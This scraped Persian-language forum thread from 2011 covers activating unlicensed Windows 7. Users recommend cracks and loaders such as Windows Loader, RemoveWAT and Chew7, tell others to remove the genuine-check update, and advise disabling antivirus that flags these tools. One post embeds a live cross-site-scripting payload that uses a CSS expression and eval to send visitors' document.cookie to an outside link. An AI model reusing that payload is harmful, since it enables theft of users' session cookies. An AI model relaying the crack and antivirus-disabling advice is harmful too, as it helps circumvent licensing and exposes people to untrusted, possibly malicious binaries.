من ويندوز ٧ enterprise رو قانوني كردم ولي شك دارم.چه طور ميتونم مطمئن شم كه قانونيه؟

mohammadrezams
08-01-2011, 11:16
سلام من ویندوزم با کرک 7Loader By Orbit30 and Hazar 1.2 استفاده میکردم چند روز پیش از کار افتاد الان هیچ کرکی کار نمیکنه . دسکتاپ سیاه شده و سمت چپ پایین نوشته This copy of windows is not genuine
راهی هست یا باید ویندوز عوض کنم ؟

Mohammad King
08-01-2011, 15:10
سلام من چطور میتونم ویندوز 7 روی لپ تاپ نصب کنم؟
ممنون میشم مراحل نصب رو واسم کپی کنید.
قبلا فقط XP نصب کردم آیا مثل همون باید عمل کنم؟
اگر ویندوز xp نصب کردین قطعا ن میتونید ویندوز7 هم نصب کنید چون نصب ویندوز 7 ساده تر از xp هست

من ويندوز ٧ enterprise رو قانوني كردم ولي شك دارم.چه طور ميتونم مطمئن شم كه قانونيه؟
مسیر زیر را برید:
start>control panel>system

اگر نوشته بود ویندوز not genun که اکیتو نیست ببین اونجا چی نوشته؟

armin_punisher6
08-01-2011, 15:20
اگر ویندوز xp نصب کردین قطعا ن میتونید ویندوز7 هم نصب کنید چون نصب ویندوز 7 ساده تر از xp هست

مسیر زیر را برید:
start>control panel>system

اگر نوشته بود ویندوز not genun که اکیتو نیست ببین اونجا چی نوشته؟
اینم عکسش

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Dew Drop
08-01-2011, 17:44
سلام من ویندوزم با کرک 7Loader By Orbit30 and Hazar 1.2 استفاده میکردم چند روز پیش از کار افتاد الان هیچ کرکی کار نمیکنه . دسکتاپ سیاه شده و سمت چپ پایین نوشته This copy of windows is not genuine
راهی هست یا باید ویندوز عوض کنم ؟

سلام
از remove wat استفاده کنید ببینید جواب میده.

Mohammad King
08-01-2011, 17:46
[QUOTE=armin_punisher6;5754217]اینم عکسش

ویندوز شما در حال حاضر اکتیو هست

sin2x=2sinxcosx
08-01-2011, 19:43
سلام .

پشت لپ تاپ من یه Product Key برای ویندوز 7 هست . این معنیش اینه که من هر موقع بخوام ویندوز 7 رو از هر دیسکی نصب کنم ویندوزم اورجینال خواهد بود ؟
موقعی که خریدم Home Premium توش بود که پاکش کردم . حالا اگه بخوام نصب کنم اورجینال میشه ؟

5646456ftgfghfhgdh
08-01-2011, 19:45
چرا کار نمی ده ؟؟؟؟
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]'+document.cookie;this.sss=null`styl e='font-size:0;)'

mohammadrezams
09-01-2011, 00:03
سلام
از remove wat استفاده کنید ببینید جواب میده.

سلام
هیچ تغییری نکرده. یه چیزی رو یادم رفت بگم بعد از روشن شدن همیشه این پنجره میاد :

niki2934
11-01-2011, 07:43
منکه با این کرک ها نتونستم ویندوزمو فعال کنم ولی یه کرک از سافت گذر دانلود کردم براحتی فعال شد اسمشم میذارم که اگه کسی خواست استفاده کنه
فقط اگه آنتی ویروستون بهش گیر داد قبلش اونو غیر فعال کنید
Windows 7 Loader eXtreme Edition 3.502

Mohammad King
11-01-2011, 15:55
سلام
هیچ تغییری نکرده. یه چیزی رو یادم رفت بگم بعد از روشن شدن همیشه این پنجره میاد :

سلام این فایل از زیپ خارج کن بعد توی مسیر:

c:\windows\system32

پیست کن ببین مشکلت حل میشه

Mohammad King
11-01-2011, 16:05
سلام .

پشت لپ تاپ من یه Product Key برای ویندوز 7 هست . این معنیش اینه که من هر موقع بخوام ویندوز 7 رو از هر دیسکی نصب کنم ویندوزم اورجینال خواهد بود ؟
موقعی که خریدم Home Premium توش بود که پاکش کردم . حالا اگه بخوام نصب کنم اورجینال میشه ؟

با این سریال ویندوز هایی از این گروه که روی لپ تاپ شما هست اکتیو و اورجینال میشه

nakhyinthezone
11-01-2011, 17:32
وقتتون بخیر
یه سوالی داشتم.. من رو لپ تاپم کنار مک یه وین۷ نصب کردم که الان میخوام کرکش کنم اما دکمه ی کرک تو خود اتورانش کار نمیکنه! البته تو پی سی امتحان کردم کار میکرد نمیدونم چرا تو لپ تاپ بازش نمیکنه...ممنون میشم راهنماییم کنین

mohamad skystar
12-01-2011, 01:21
سلام.من ویندوز 7 64BIT دارم.آپدیت کردم.اگه ویندوزم رو عوض کنم چیکار کنم که آپدیت از بین نره؟
راهنمایی کنید.ممنون

Mohammad King
12-01-2011, 10:08
سلام اینجا را بخونید:

smahdih
12-01-2011, 12:06
سلام

من ویندوز مقانونی نبود بعد اون فایل activator که صفحه اول معرفی کرده بودین رو اجرا کردم الان گوشه پایین سمت راست مینویسه :
test mode
windows 7
build 7600

رفتم تو propertise کامپیوتر اونجا زده بود
windows is activated علامت genuine هم بود

test mode مشکلی ایجاد نمیکنه؟

Dew Drop
12-01-2011, 15:34
سلام

من ویندوز مقانونی نبود بعد اون فایل activator که صفحه اول معرفی کرده بودین رو اجرا کردم الان گوشه پایین سمت راست مینویسه :
test mode
windows 7
build 7600

سلام
این remover رو امتحان کنید ببینید نوشته رو پاک میکنه.

Mohammad King
12-01-2011, 16:00
سلام

test mode
windows 7
build 7600

سلام

میتونید این پست هم بخونید:
#4 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

Ali*Reza
14-01-2011, 16:30
سلام

من ویندوز 7 64 بیتی دارم و میخوام اکتیوش کنم، ابتدا نرم افزار RemoveWAT رو نصب میکنم ولی وقتی که Windows Loader v1.9.3 رو نصب میکنم ، ویندوزم رو غیر اورجینال میشناسه و مجبورم دوباره از RemoveWAT استفاده کنم تا اون پیغام از بین بره.
لطفا راهنمایی کنین.

armin_punisher6
14-01-2011, 17:58
من ویندوز 7 64 بیتی نسخه enterprise دارم.genuine شده هست حتی تو سایت مایکروسافت هم رفتم گفت قانونیه اگه میخوای برنامه های سکیوریتی هم بخر.ولی توی system نوشته 24days to activate.activate now?
که رو activate now کلیک میکنم ارور میده.مشکل از کجاست؟

alinasrollahi
15-01-2011, 00:50
یه سئوال:
من برای اکتیو کردن ویندوز اینقدر از این کرکها استفاده کردم و آن اینستال کردم که نمیدونم آخرینش کدوم بوده تا اون رو هم آن اینستال کنم و این کرک شما رو امتحان کنم.
حالا باید چیکار کنم حتمأ باید آخرین کرک رو آناینستال کرد؟
ممنون

payan_zaman
15-01-2011, 16:46
سلام

من ویندوز 7 64 بیتی دارم و میخوام اکتیوش کنم، ابتدا نرم افزار RemoveWAT رو نصب میکنم ولی وقتی که Windows Loader v1.9.3 رو نصب میکنم ، ویندوزم رو غیر اورجینال میشناسه و مجبورم دوباره از RemoveWAT استفاده کنم تا اون پیغام از بین بره.
لطفا راهنمایی کنین.

update مخصوص چک کردن اکتیو ویندوز رو نباید دانلود کنی
با ویندوز لودر تقریبا 99 درصد سیستم ها اکتیو میشند

Ali*Reza
15-01-2011, 18:53
update مخصوص چک کردن اکتیو ویندوز رو نباید دانلود کنی
با ویندوز لودر تقریبا 99 درصد سیستم ها اکتیو میشند

ممنون.
حالا چیکار کنم؟به گفته شما من احتمالا اون فایل رو گرفتم.

afshin b
15-01-2011, 23:03
سلام دوستان
نمیدون جاش اینجاست یا نه، به هر حال، میخواستم بدونم windows 7 home premium دستکاری نشده توی بازار پیدا میشه؟ توی نت چطور؟ حجمش چقدره؟ میخوام با سریال اکتیوش کنم.
مرسی.

m.amin4u
16-01-2011, 14:29
سلام
من تمام راه ها رو رفتم ولی قتی میخواد ولید بشه یه صفحه باز میشه و توش دانلود و کانتنیو هست من دانلود رو انجام میدم و نصب هم میکنم ولی روی دکمه کانتنیو که کلیلک میکنم اتقاقی نمی افته

حالا باید جیکار کنم؟؟؟؟؟؟

Mohammad King
16-01-2011, 17:39
سلام

لطفا راهنمایی کنین.
سلام فایلی که در این پست #78 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) پیوست کردم دانلود کن و توی مسیری که گفتم پیست کن بعد با استفاده از کرکی که در پست شمار1 پیوست کردم را دانلود که ابتدا دکمه آنیستال را بزن و یک بار ری استارت کن بعد دوباره کرک را اجرا کن بعد اینستال کن.

من ویندوز 7 64 بیتی نسخه enterprise دارم.genuine شده هست حتی تو سایت مایکروسافت هم رفتم گفت قانونیه اگه میخوای برنامه های سکیوریتی هم بخر.ولی توی system نوشته 24days to activate.activate now?
که رو activate now کلیک میکنم ارور میده.مشکل از کجاست؟
کرک پست 1 را دانلود کن ابتدا گزینه آنیستال رل بزن 1 بار ری استارت کن بعد دوبباره کرک رو اجرا کن بعد اینستاش کن

یه سئوال:
من برای اکتیو کردن ویندوز اینقدر از این کرکها استفاده کردم و آن اینستال کردم که نمیدونم آخرینش کدوم بوده تا اون رو هم آن اینستال کنم و این کرک شما رو امتحان کنم.
حالا باید چیکار کنم حتمأ باید آخرین کرک رو آناینستال کرد؟
ممنون
کرک پست 1 رو دانلود کن گزینه آنیستال داره

Mohammad King
16-01-2011, 17:45
سلام
من تمام راه ها رو رفتم ولی قتی میخواد ولید بشه یه صفحه باز میشه و توش دانلود و کانتنیو هست من دانلود رو انجام میدم و نصب هم میکنم ولی روی دکمه کانتنیو که کلیلک میکنم اتقاقی نمی افته

حالا باید جیکار کنم؟؟؟؟؟؟
سلام

از کرک پست شماره 1 استفاده کردین؟

Golestan64
16-01-2011, 23:04
سلام
من از ویندوز ایکس پی استفاده میکنم و حالا میخوام ویندوز 7 نصب کنم میخواستم بدونم ویندوز 7 چجوریه و آیا میتونم مثل ایکس پی راحت کار کنم و برنامه های مختلف رو نصب کنم و راحت برم اینترنت و . . .
این قضیه اکتیو و غیر اکتیو بودن ویندوز چیه تو این چند صفحه حرفش بود ؟ مگه مثل ویندوز ایکس پی با نوشتن یه سریال نامبر نصب نمیشه ؟
حداقل سیستم مورد نیاز برای نصب ویندوز 7 چی هست ؟
یه ذره هم در مورد ویندوز 7 توضیح بدین ممنون میشم

afshin b
17-01-2011, 12:32
سلام دوستان
نمیدون جاش اینجاست یا نه، به هر حال، میخواستم بدونم windows 7 home premium دستکاری نشده توی بازار پیدا میشه؟ توی نت چطور؟ حجمش چقدره؟ میخوام با سریال اکتیوش کنم.
مرسی.
مرسی از لطف دوستان:13:

Golestan64
17-01-2011, 17:54
سلام
من از ویندوز ایکس پی استفاده میکنم و حالا میخوام ویندوز 7 نصب کنم میخواستم بدونم ویندوز 7 چجوریه و آیا میتونم مثل ایکس پی راحت کار کنم و برنامه های مختلف رو نصب کنم و راحت برم اینترنت و . . .
این قضیه اکتیو و غیر اکتیو بودن ویندوز چیه تو این چند صفحه حرفش بود ؟ مگه مثل ویندوز ایکس پی با نوشتن یه سریال نامبر نصب نمیشه ؟

:19::19::19:

Ali*Reza
17-01-2011, 18:02
سلام

به نظر من از لحاظ نصب نرم افزار ها مشکلی نخواهید داشت و فقط اگر سخت افزاری دارین که خیلی قدیمی هست شاید درایور مربوطه اش رو سخت گیر بیارین.
همونطور که در پستهای قبلی میبینین با آپدیت کردن ویندوز (اونهم یک فایل خاص) ممکن است ویندوزتون غیر اورجینال شناخته بشه در غیر اینصورت مشکلی ندارین.
پیشنهاد میکنم اگه رمتون کمتر از 1 گیگ هست از سون استفاده نکنین.

S A M S U N G
17-01-2011, 19:41
سلام دوستان
مرسی.
سلام .

بله دوست عزیز توی نت هستش . حجمش 3 گیگ هستش . من واسه لپ تاپم دانلودش کردم و با سریال اصلی خودش اکتیوش کردم .

مخلصیم.

بهنازی
17-01-2011, 19:45
با سلام پایین دسکتاپ این پیغامو نشون میده:
this copy of windows is not genuiue

آیا باید اکتیو بشه چجوری باید اینکا رو بکنم 32 بیت هستش

reb
17-01-2011, 19:50

منظورش اینه که شما احیانا خدای ناکرده فراموش کردید که پول ویندوز رو بپردازید:31:

alinasrollahi
18-01-2011, 01:33
میشه بگی بعد از اینکه کرک فعلی رو با کرک پست 1 آناینستال کردم از کدوم کرک میتونم برای اکتیو مجدد استفاده کنم؟
ممنون

Mohammad King
18-01-2011, 10:02

کرکها در پست اول پیوست شدن....

میتونید ار هر کدوم که خواستید استفاده کنید روش استفاده هم توضیح داده شده

میشه بگی بعد از اینکه کرک فعلی رو با کرک پست 1 آناینستال کردم از کدوم کرک میتونم برای اکتیو مجدد استفاده کنم؟
ممنون
از هر کدوم که خواستین من نوشتم که جفت کرک ها برای یک شرکت فقط کرک 2 جدید تره همین

cheetoz_motori
19-01-2011, 18:10
با سلام
من قبلا ویندوزام رو کرک کرده بودم مدتی هست که این پیغامی که میبینید وسط کار در ویندوز 1 دفعه ظاهر میشه درضمن با این حال من تمام آپدیت ها رو تا امروز گرفتم و ویندوزم کاملا آپدیت هست فقط این پیغامه مزاحم هست چطوری میشه پاک اش کرد
با تشکر

cheetoz_motori
19-01-2011, 18:17
منظورش اینه که شما احیانا خدای ناکرده فراموش کردید که پول ویندوز رو بپردازید:31:

سلام شرمنده پسورد فایل رو لطف میکنید!!!

Mohammad King
20-01-2011, 09:28
سلام

با استفاده از کرک پست اول و توضیحات طریقه استفاده میتونید ویندوز را دوباره فعال کنید

tahoora001
20-01-2011, 16:25
سلام

من با REMOVE WAT آخرین آپدیت رو پاک کردم و خود wAT رو هم که اجرا میکنم میگه :aLREADY REMOVED اما هنوز تو لیست آپدیت ها میبینمش ...و هیچ کدم از کرک ها گزینه های instal/uninstall هنوز هم واسم خاموشه و من نمیتونم نصبشون کنم....چه کار کنم>؟
متن this copy is not genuie build7600 هم که رو دسکتاپم هست.....?????????

cheetoz_motori
20-01-2011, 16:55
سلام

با استفاده از کرک پست اول و توضیحات طریقه استفاده میتونید ویندوز را دوباره فعال کنید

هر 2 کرک را تست کردم کلیدهای install ,uninstall در هر 2 خاموش است.

shervin1358
22-01-2011, 09:48
سلام
من با توجه به آخرین آپدیت های ویندوز 7 ، اکتیو ویندوزم که 64 بیت هست مشکل پیدا نکرد.
آیا اگر سرویس پک 1 رو نصب کنم ممکنه برای اکتیو کردن مشکل پیدا کنم؟
اگه مشکل دار بشه باید کدام اکتیویت رو نصب کنم؟

ممنون میشم اگر راهنمایی کنید.

Mohammad King
22-01-2011, 09:59
سلام
من با توجه به آخرین آپدیت های ویندوز 7 ، اکتیو ویندوزم که 64 بیت هست مشکل پیدا نکرد.
آیا اگر سرویس پک 1 رو نصب کنم ممکنه برای اکتیو کردن مشکل پیدا کنم؟
اگه مشکل دار بشه باید کدام اکتیویت رو نصب کنم؟

ممنون میشم اگر راهنمایی کنید.

نه فکر نکنم مشکلی پیدا کنه

فرقی نداره از هر کدوم که خواستی استفاده کن....فقط دومی جدید تره.

Mr.Vahid
22-01-2011, 19:47
ویندوزم هی پیغام میده که ارجینال نیست دو تا کرک صفحه اول هم اجرا کردم نشد

حالا باید چی کار کنم

Dew Drop
22-01-2011, 23:25
ویندوزم هی پیغام میده که ارجینال نیست دو تا کرک صفحه اول هم اجرا کردم نشد

حالا باید چی کار کنم

سلام
این رو هم یه امتحانی کنید بد نیست,معمولاً تو خیلی موارد جواب داده...

mansour5550
23-01-2011, 01:19
سلام دوستان گل ، من تقریبا 1 سالی میشه Windows 7 Ultimate N رو نصب کردم (همونی که مخصوص اروپاست و مدیا پلیر نداره) اولین بار با کرکی که تو سی دی بود کرکش کردم که درست شد ،حدود چند ماه پیش از کار افتاد که فهمیدم از طریق آپدیت این بلا سرش اومده و WAT رو گرفتم و فعالش کردم ولی اینبار 3 روزی میشه از کار افتاده و هر کرکی که بگین امتحان کردم ، نمیشه که نمیشه ، دوستان چیکار کنم؟
اینم لیست کرکهایی که استفاده کردم :
Win 7 Crack And Remove Remove WAT Update KB971033
bie_7install86
Orbit30 & Hazar 7Loader v1.4 R3
Windows 7 Developer Activation v1.1.3
Windows 7 Loader v1.7.2
Windows 7 Loader v1.8.1
Windows Genuine Advantage Validation v1.9.0040.0
Crack Windows7
Win7 Loader eXtreme Edition v3.011

اینم عکس ارور :

reb
23-01-2011, 01:33

تنها چاره همینه: Chew7
حواست باشه بعضی از آنتی ویروسها بهش گیر میدن.

mansour5550
23-01-2011, 02:39

تنها چاره همینه: Chew7
حواست باشه بعضی از آنتی ویروسها بهش گیر میدن.

مرسی دوست من ولی وقتی اینستال رو زدم بعد از چند ثانیه Failure میزنه و برنامه بسته میشه حتی آنتی ویروسمو هم Disable کردم

neon_91
23-01-2011, 13:53
بعد حدود یک ماه که کامپیورو وشن کردم به اینترنت وصل شدم بعد مدتی این پیغام در سمت راست پایین دسکتاپم ظاهر شده.
بعد این هم آپدیت میشه و حدود 40 مگ آپدیت کردم ولی نمی خام این تو دسکتاپم باشه کمک کنید خواهشا

nimamehdi
23-01-2011, 20:24
از Remove Wat 2.2.5 استفاده کن حتما تو آدمین برو اجرا کن بیشتر آنتی ویروس ها هم به این گیر میدن

من از سایت download70.com گرفتم که ورژن جدید تر پیدا کردی از اون استفاده کن حتما تو آدمین اجرا کن

tochal62
23-01-2011, 21:28
سلام .
رفقا یه سوال .
من می خوام alcohol 120 رو نصب کنم . تو نصبش مشکل ندارم . اما وقتی نصب میشه برای اجرا باید register کنم . help اون سی دی که ازش ریختم یه keygan گذاشته ، روش که کلیک می کنم این ارور رو میده :
windows can not access the specified device,path or file.you may not have the appropriate permissions to access the item

مشکل کجاست ؟

---------- Post added at 10:28 PM ---------- Previous post was at 10:26 PM ----------

سلام .
رفقا یه سوال .
من می خوام alcohol 120 رو نصب کنم . تو نصبش مشکل ندارم . اما وقتی نصب میشه برای اجرا باید register کنم . help اون سی دی که ازش ریختم یه keygan گذاشته ، روش که کلیک می کنم این ارور رو میده :
windows can not access the specified device,path or file.you may not have the appropriate permissions to access the item

مشکل کجاست ؟

راستی ویندوزم 7 سی و دو بیتی هستش .

neon_91
23-01-2011, 21:33
از Remove Wat 2.2.5 استفاده کن حتما تو آدمین برو اجرا کن بیشتر آنتی ویروس ها هم به این گیر میدن

من از سایت download70.com گرفتم که ورژن جدید تر پیدا کردی از اون استفاده کن حتما تو آدمین اجرا کن

دمت گرم کار کرد حالا باید ببینم بعدا چی میشه.

mansour5550
24-01-2011, 00:47
برای مشکل من راهی نیست؟

nimamehdi
24-01-2011, 08:19
برای مشکل من راهی نیست؟

آقا از این remover که گفتم تو پست قبل استفاده کن

mansour5550
24-01-2011, 22:45
دوست من از اونم استفاده کردم مگه منظورت این نیست؟ : Win 7 Crack And Remove Remove WAT Update KB971033

nimamehdi
24-01-2011, 23:08
دوست من از اونم استفاده کردم مگه منظورت این نیست؟ : Win 7 Crack And Remove Remove WAT Update KB971033

دوست عزیز این که شما گفتی آپدیت ویندوز که همه کرک ها را می پرونه اول این رو unistall کن بعد برو تو سایتی که دادم برنامه که اسمش و نوشتم سرچ بزن و حتما تو ادمین اجراش کن

shervin1358
25-01-2011, 02:39
با سلام خدمت دوستان
با اجازه مدیر بخش و دوستان میخواستم یه کرک جدید از گروه DAZ بزارم که آخرین ورژن هست
از لینک زیر دریافت کنید :

ezat451
25-01-2011, 13:07
درود:
جديدا وقتي ويندوز 7 را نصب مي كنم بعد از نصب وبعد از ريستارت و كامل شدن ويندوز بعد از دوبار ريستارت موقع ريستارت كردن يك صفحه ابي مياد با كلي نوشته كه ميگه ويندوز داراي مشكل است چيكار كنم

aliupdate
25-01-2011, 13:35
درود:
جديدا وقتي ويندوز 7 را نصب مي كنم بعد از نصب وبعد از ريستارت و كامل شدن ويندوز بعد از دوبار ريستارت موقع ريستارت كردن يك صفحه ابي مياد با كلي نوشته كه ميگه ويندوز داراي مشكل است چيكار كنم
دوست عزیز این تاپیک به اکتیو و فعال کردن ویندوز 7 اختصاص داره نه چیز دیگه شما توی انجمن 7 اگر 'صفحه ی ابی' یا Blue screen رو جستجو میکردین هزاران تاپیک در این باره پیدا میشد که زود جوابتونو میگرفتید:

mansour5550
25-01-2011, 16:13
دوست عزیز این که شما گفتی آپدیت ویندوز که همه کرک ها را می پرونه اول این رو unistall کن بعد برو تو سایتی که دادم برنامه که اسمش و نوشتم سرچ بزن و حتما تو ادمین اجراش کن

دوست من مگه منظورتون همین نیست :

آخه به آون آدرسی که رفتم بازم همین برنامه بود اینم آدرسش :

--------------------------------
و دوستان من هر کدوم از ورژنهای کرک Windows Loader رو که اجرا میکنم پیغام میده باید اول کرکهای دیگه رو پاک کنی من همه رو پاک کردم دیگه باید از کجا بفهمم که کدوما پاک نشدن که این کرک کار کنه ببینین :

hady1364
26-01-2011, 19:43
لینک مستقیم Windows.7.Loader.v1.9.5-DAZ که دوستان گذاشته بودن

لینکهای دیگر

mansour5550
27-01-2011, 01:29
دوستان خیلی اعصلبمو خورد کرده به هیچ نحو نمیتونم ویندوزمو کرک کنم الان همه کرکها رو پاک کردم و برنامه Windows.7.Loader.v1.9.5-DAZ رو که اجرا میکنم به جای ارور قبلی که عکسشو توی پست 127 گزاشتم ارور پایین رو میده :

تورو خدا یکی کمکم بکنه دیگه اعصاب برام نزاشته

hady1364
27-01-2011, 18:01
دوست عزیز؛
برای کرک کردن UAC رو غیرفعال کردین؟
برای اجرای فایل کرک Run as Administrator رو انتخاب میکنی؟
دقت کن که برای پاک کردن کرکهای قبلی باید اول تک تک اونا رو اجرا کنی بعد توی صفحه خودشون UNISTALL رو بزنی؛ اینجوری نیست که با آخرین نسخه یه کرک بشه کرکهای قبلی رو پاک کرد
اون آپدیتی که کرکها رو کشف میکرد رو نصب کردی؟

mansour5550
27-01-2011, 23:35
UAC رو خیلی وقته غیر فعال کردم و در مورد Run As Administarator هم آره با همین روش استارتشون میکنم ولی در مورد آپدیتی که کرکها رو کشف میکرد منظورتو نمیفهمم ،منظورت WAT Remover هست ؟آره نصب کردم و الان دوباره پاک کردم

hamidn67
28-01-2011, 00:18
salam
man windows note bookam parid back up am nadaram agar bekham windowsam orjinal beshe bayad chekar konam?
albate prudakt key daram vali nemidoonam windowzam home ya home prime bode hamasham emtehan kardam Product Key javab nemide va rdesh mikone
bekham windowsam orjinal beshe bayad che kar konam?

Golbarg01
28-01-2011, 19:07
من چند روزه ویندوز 7 نصب کردم و از طریق فایل activator در دی وی دی jb team هم اکتیوش کردم.ولی دیروز ناخواسته رفتم تو ویندوز آپدیت و گزینه اپدیت رو زدم ولی بعد از اون ظاهرا اکتیوش پریده و در مای کامپیوتر می نویسه 15 روز از قانونی بودنش مونده.
البته اون فایل اکتیویتور رو هم دوباره اجرا کردم با تمام مراحلش پیغام successfully هم میده ولی دیگه اکتیو نمیشه !
چیکار کنم؟

چه نرم افزاری باید نصب کنم تا اکتیو دوباره برگرده؟

night lord
31-01-2011, 10:36
دوستانی که با اکتیو مشکل دارن برن به این آدرس شاید مشکلشون با این نرمافزار که برای sp1 هست حل بشه

Steps-Rap
31-01-2011, 21:10
سلام...
کسی از p30world این ویندوز 7 سروی پک 1 رو سفارش داده؟
من الان سفارش دادم..چند روزه دستم میرسه؟
همه چیش کامله این ویندوز؟
منظورم همین اکتیو و کرک هاشو ایناست.....

mansour5550
01-02-2011, 01:58
دوستانی که با اکتیو مشکل دارن برن به این آدرس شاید مشکلشون با این نرمافزار که برای sp1 هست حل بشه

داداش گل مرسی قربون دستت بالاخره این یکی برای من جواب داد بازم ممنون

eblisandenzo
01-02-2011, 14:06
سلام دوستان . من امروز رو desktop نوشتکه windows is not genuin تو my com هم که میرم همینه .عکسش هم گذاشتم . یکی بگه چه کنم !

eblisandenzo
01-02-2011, 15:18
دوستان من removewat رو نصب کردم دیگه نوشته تو des نیست تو my computer هم دیگه مثل بالا ننوشته که you must active . وقتی wat رو باز میکنم بعد از res شدن باز هم نوشته که restore wat .
این یعنی درست شده ؟

نیازی نیست که اون پچ ها رو نصب کنم ؟

اینم عکس بعد از استفاده از WAT

Mohammad King
01-02-2011, 16:43
سلام...
کسی از p30world این ویندوز 7 سروی پک 1 رو سفارش داده؟
من الان سفارش دادم..چند روزه دستم میرسه؟
همه چیش کامله این ویندوز؟
منظورم همین اکتیو و کرک هاشو ایناست.....

اگر پیشتاز باشه 1 هفته و لی اگر ممولی باشه میری بالای 2 هفته

دوستان من removewat رو نصب کردم دیگه نوشته تو des نیست تو my computer هم دیگه مثل بالا ننوشته که you must active . وقتی wat رو باز میکنم بعد از res شدن باز هم نوشته که restore wat .
این یعنی درست شده ؟

نیازی نیست که اون پچ ها رو نصب کنم ؟

اینم عکس بعد از استفاده از WAT

به نظر میرسه مشکلی نیست.

ولی مشکلی نداره از پچ ها هم استفاده کنید

eblisandenzo
01-02-2011, 17:00
کدوم patch بهتره ؟

AFSORDEH
01-02-2011, 17:55
سلام به همه ي دوستان :20:

چند تا سوال در مورد ويندوز 7 :

آيا اين ويندوز مي تواند در كنار ويندوز XP بر روي يك سيستم نصب شود يا خير؟

قابليت نصب بر روي فايل سيستم FAT32 را دارد يا خير؟

با توجه به اينكه در مباحث آموزشي اين ويندوز به اين نكته اشاره شده است كه """ از فايل ها و .... مورد نيازتان يك كپي پشتيبان تهيه كنيد،""" مي خواستم بپرسم آيا درايوي كه اين ويندوز در آن نصب مي شود 100% محتويات آن از بين مي رود؟ و اينكه چقدر در صد خطرات نصب اين ويندوز (از جمله حذف ناگهاني اطلاعات و يا به هم ريختن جدول پارتيشن بندي) نسبت به ويندوز ويستا بيشتر است!

موفق باشيد :11:

aliupdate
01-02-2011, 18:23
سلام به همه ي دوستان :20:

چند تا سوال در مورد ويندوز 7 :

با توجه به اينكه در مباحث آموزشي اين ويندوز به اين نكته اشاره شده است كه """ از فايل ها و .... مورد نيازتان يك كپي پشتيبان تهيه كنيد،""" مي خواستم بپرسم آيا درايوي كه اين ويندوز در آن نصب مي شود 100% محتويات آن از بين مي رود؟ و اينكه چقدر در صد خطرات نصب اين ويندوز (از جمله حذف ناگهاني اطلاعات و يا به هم ريختن جدول پارتيشن بندي) نسبت به ويندوز ويستا بيشتر است!

موفق باشيد :11:
سلام
ربطی به این تاپیک نداره

بله میشه
فقط باید اونا رو به ترتیب انتشار نصب کنید یعنی:اول XP بعد ویستا و بعد 7

باید رو NTFS نصب کنید

ي خواستم بپرسم آيا درايوي كه اين ويندوز در آن نصب مي شود 100% محتويات آن از بين مي رود
خیر
وقتی فرمت نشود از بین نمیرود

Steps-Rap
01-02-2011, 18:43
ببخشید من یه چیزیو نمیدونم..
تفاوت نسخه ی 32 بیتی و 64 بیتی تو چیه؟

aliupdate
01-02-2011, 18:54
ببخشید من یه چیزیو نمیدونم..

سلام
تو این تاپیک در مورد فعال سازی و قانونی کردن ویندوز 7بحث میشه نه چیزای دیگه.

Mohammad King
01-02-2011, 21:27
کدوم patch بهتره ؟

فرق نداره شما دومی رو بگیر:46:

رضاکلاته
01-02-2011, 22:30
سلام دوستان آیا میشه آپدیتهای ویندوز رو در جایی کپی کرد ودر زمان نصب مجدد ویندوز از اون استفاده کرد؟ اگه بله چطوری؟

aliupdate
01-02-2011, 22:48
سلام دوستان آیا میشه آپدیتهای ویندوز رو در جایی کپی کرد ودر زمان نصب مجدد ویندوز از اون استفاده کرد؟ اگه بله چطوری؟

headshoooter
02-02-2011, 01:04
با پچ دومی که معرفی کردین نتونستو اکتیو کنم !! run as adminstator رو هم زدم ولی هیچ تغییری نکرد!!!
چی کار باید بکنم

sobhdamo
02-02-2011, 11:18
سلام دوستان من وقتی که ویندوز 7 رو با chew7 فعال کردم دیگه نمیتونم به مشخصات کامپیوتر وارد بشم و ویندوز اخطاری مبنی بر وجود مششکل میده و کلا اکسپلورر دوباره ریست میکنه.

Mohammad King
02-02-2011, 12:40
با پچ دومی که معرفی کردین نتونستو اکتیو کنم !! run as adminstator رو هم زدم ولی هیچ تغییری نکرد!!!
چی کار باید بکنم

اگر طبق راهنمایی طریقه استفاده عمل کنید مشکلی نباید باشه

O B M A R
02-02-2011, 14:03
ویندوز 7 من الان اکتو و هیچ مشکلی هم نداره میخوام بدونم امکانش هست بعد از آپدیت ویندوز غیرفعال بشه و از کار بیفته یا با خیال راحت آپدیتش کنم؟!
Apollo
02-02-2011, 15:43
کرکی برای Sp1 نیومد ؟

hedye222222
06-02-2011, 14:59
سلام وستان
لطفا به من بگید چطور میتونم ویندوز سون رو رجیستر کنم.چون هر چی این کد های توی دی وی دی رو می زنم میگه اشتباهه.
ممنون

Mohammad King
06-02-2011, 15:30
ویندوز 7 من الان اکتو و هیچ مشکلی هم نداره میخوام بدونم امکانش هست بعد از آپدیت ویندوز غیرفعال بشه و از کار بیفته یا با خیال راحت آپدیتش کنم؟!

کرکی برای Sp1 نیومد ؟

سلام وستان
لطفا به من بگید چطور میتونم ویندوز سون رو رجیستر کنم.چون هر چی این کد های توی دی وی دی رو می زنم میگه اشتباهه.
ممنون

سلام

جواب به این چند پست پست شماره 1 همین تاپیک داده شده

golmohammadi
07-02-2011, 02:37
سلام دوستان
من سون سرویس پک 1 را امروز خریدم و نصب کردم
اما مشکوکم (چون زده 2009)
شما این عکسو ببینید
آیا این نسخه قدیمی هست ؟
یا خودشه ؟
البته رفتم قسمت اپدیتها نوشته که ویندوز شما اپدیت هست

لینک عکس:

hassanminai
07-02-2011, 12:12
با سلام و عرض ادب
ايا ويندوز اورجينال هم بايد اكتيو بشه؟
اگر جواب مثبته ميشه بگين چطوري؟
براي من از دوبي يك پك اوريجينال ويندوز 7 اوردن كه موقع نصب از من
سريال نامبر حك شده در پكش رو نخواست

و ايا در نصب تعداد دفعات اين ويندوز قانوني محدوديتي هست؟
ممنونم از راهنمايي شما

ebicross
07-02-2011, 15:18
کرکی برای Sp1 نیومد ؟

